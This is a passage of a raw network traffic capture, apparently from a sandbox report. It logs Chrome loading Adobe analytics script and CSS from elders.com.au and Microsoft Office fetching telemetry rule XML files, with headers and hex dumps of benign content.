                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:17 UTC676INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    access-control-expose-headers: *
                                                                                                                                    Cache-Control: public, max-age=604800, s-maxage=43200
                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                    etag: W/"15a2-MVUJigmi2LrilKBEw9gkUr3cbLw"
                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-served-by: cache-sjc10046-SJC, cache-sjc10025-SJC
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730563129.199387,VS0,VS0,VE29
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb538f3ed9463e-DFW
                                                                                                                                    2024-11-05 08:03:17 UTC693INData Raw: 31 35 61 32 0d 0a 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 41 64 6f 62 65 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 74 6f 20 79 6f 75 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 59 6f 75 20 6d 61 79 20 6f 62 74 61 69 6e 20 61 20 63 6f 70 79 0a 20 2a 20 6f 66 20 74 68 65 20 4c 69 63 65 6e 73 65 20 61 74 20 68 74
                                                                                                                                    Data Ascii: 15a2/* * Copyright 2024 Adobe. All rights reserved. * This file is licensed to you under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. You may obtain a copy * of the License at ht
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 20 73 74 72 69 63 74 27 3b 0a 0a 20 20 2f 2a 20 65 73 6c 69 6e 74 2d 65 6e 76 20 62 72 6f 77 73 65 72 20 2a 2f 0a 20 20 66 75 6e 63 74 69 6f 6e 20 73 61 6d 70 6c 65 52 55 4d 28 63 68 65 63 6b 70 6f 69 6e 74 2c 20 64 61 74 61 29 20 7b 0a 20 20 20 20 2f 2f 20 65 73 6c 69 6e 74 2d 64 69 73 61 62 6c 65 2d 6e 65 78 74 2d 6c 69 6e 65 20 6d 61 78 2d 6c 65 6e 0a 20 20 20 20 63 6f 6e 73 74 20 74 69 6d 65 53 68 69 66 74 20 3d 20 28 29 20 3d 3e 20 28 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3f 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 20 3a 20 44 61 74 65 2e 6e 6f 77 28 29 20 2d 20 77 69 6e 64 6f 77 2e 68 6c 78 2e 72 75 6d 2e 66 69 72 73 74 52 65 61 64 54 69 6d 65 29 3b 0a 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20
                                                                                                                                    Data Ascii: strict'; /* eslint-env browser */ function sampleRUM(checkpoint, data) { // eslint-disable-next-line max-len const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime); try {
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 20 20 20 20 20 20 2e 72 65 70 6c 61 63 65 28 2f 61 74 20 28 5b 5e 20 5d 2b 29 20 5c 28 28 2e 2b 29 5c 29 2f 2c 20 27 24 31 40 24 32 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 70 6c 61 63 65 28 2f 20 61 74 20 2f 2c 20 27 40 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 72 69 6d 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 20 2f 2a 20 65 72 72 6f 72 20 73 74 72 75 63 74 75 72 65 20 77 61 73 20 6e 6f 74 20 61 73 20 65 78 70 65 63 74 65 64 20 2a 2f 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 72 72 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e
                                                                                                                                    Data Ascii: .replace(/at ([^ ]+) \((.+)\)/, '$1@$2') .replace(/ at /, '@') .trim(); } catch (err) { /* error structure was not as expected */ } return errData; }; window.addEventListen
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 67 69 6e 20 7d 20 3d 20 6e 65 77 20 55 52 4c 28 60 2e 72 75 6d 2f 24 7b 77 65 69 67 68 74 7d 24 7b 75 72 6c 50 61 72 61 6d 73 7d 60 2c 20 73 61 6d 70 6c 65 52 55 4d 2e 63 6f 6c 6c 65 63 74 42 61 73 65 55 52 4c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 6f 64 79 20 3d 20 6f 72 69 67 69 6e 20 3d 3d 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 20 3f 20 6e 65 77 20 42 6c 6f 62 28 5b 72 75 6d 44 61 74 61 5d 2c 20 7b 20 74 79 70 65 3a 20 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 27 20 7d 29 20 3a 20 72 75 6d 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 75 72 6c 2c 20 62 6f 64 79 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20
                                                                                                                                    Data Ascii: gin } = new URL(`.rum/${weight}${urlParams}`, sampleRUM.collectBaseURL); const body = origin === window.location.origin ? new Blob([rumData], { type: 'application/json' }) : rumData; navigator.sendBeacon(url, body); //
                                                                                                                                    2024-11-05 08:03:17 UTC746INData Raw: 7b 20 63 68 65 63 6b 70 6f 69 6e 74 2c 20 64 61 74 61 20 7d 20 7d 29 29 3b 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 6f 72 29 20 7b 0a 20 20 20 20 20 20 2f 2f 20 73 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 61 77 72 79 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 74 72 79 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 73 63 72 69 70 74 53 72 63 20 3d 20 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 29 0a 20 20 20 20 20 20 3f 20 6e 65 77 20 55 52 4c 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 2e 6f 72 69 67 69 6e 20 3a 20 6e 75 6c 6c 3b
                                                                                                                                    Data Ascii: { checkpoint, data } })); } catch (error) { // something went awry } } try { const scriptSrc = (document.currentScript && document.currentScript.src) ? new URL(document.currentScript.src, window.location.origin).origin : null;
                                                                                                                                    2024-11-05 08:03:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    40192.168.2.44980513.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 499
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                                    x-ms-request-id: 8b5c7529-c01e-00ad-2446-2ea2b9000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080317Z-158dbd74bf4jmkvwhC1SN1wwbg00000003p0000000000mb6
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:17 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    41192.168.2.44980713.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 419
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                                    x-ms-request-id: 4785079e-601e-0070-2a8e-2da0c9000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080317Z-158dbd74bf4mjxnbhC1SN1pkws00000003q00000000063k8
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:17 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    42192.168.2.44980813.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 415
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                                    x-ms-request-id: 0e31b739-001e-002b-304d-2e99f2000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080317Z-158dbd74bf4hfx6nhC1SN1z1dw00000003kg0000000029bh
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:17 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    43192.168.2.44980613.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 471
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                                    x-ms-request-id: 6b3fdf92-c01e-008e-384a-2e7381000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080317Z-157b9fd754fhlggqhC1SN1drew00000004b0000000001c1r
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:17 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    44192.168.2.44980913.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 494
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                                    x-ms-request-id: 0a8e697d-a01e-0002-295f-2e5074000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080317Z-158dbd74bf4jwfhhhC1SN1bnb000000003u0000000002fhc
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:17 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    45192.168.2.449810162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC674OUTGET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:17 UTC585INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/css;charset=utf-8
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Thu, 20 Jun 2024 09:07:06 GMT
                                                                                                                                    etag: W/"0-2386f26fb1bdc0"
                                                                                                                                    x-vhost: publish
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 1439507
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210084-DFW
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1718968730.245109,VS0,VS0,VE2
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53932c5c4629-DFW


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    46192.168.2.449811162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC674OUTGET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-head.lc-60038e123df28ea326da7b93dfc6bc75-lc.min.css HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:17 UTC606INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/css;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Wed, 23 Oct 2024 19:56:35 GMT
                                                                                                                                    etag: W/"4b89b-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-sjc10036-SJC
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1729713395.295648,VS0,VS0,VE709
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 146075
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53932f752cca-DFW
                                                                                                                                    2024-11-05 08:03:17 UTC763INData Raw: 37 64 34 30 0d 0a 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 32 3b 2d 2d 62 73 2d 70 75 72 70 6c 65 3a 23 36 66 34 32 63 31 3b 2d 2d 62 73 2d 70 69 6e 6b 3a 23 64 36 33 33 38 34 3b 2d 2d 62 73 2d 72 65 64 3a 23 64 63 33 35 34 35 3b 2d 2d 62 73 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 62 73 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 62 73 2d 67 72 65 65 6e 3a 23 31 39 38 37 35 34 3b 2d 2d 62 73 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 62 73 2d 63 79 61 6e 3a 23 30 64 63 61 66 30 3b 2d 2d 62 73 2d 77 68 69 74 65 3a 23 66 66 66 3b 2d 2d 62 73 2d 67 72 61 79 3a 23 36 63 37 35 37 64 3b 2d 2d 62 73 2d 67 72 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34
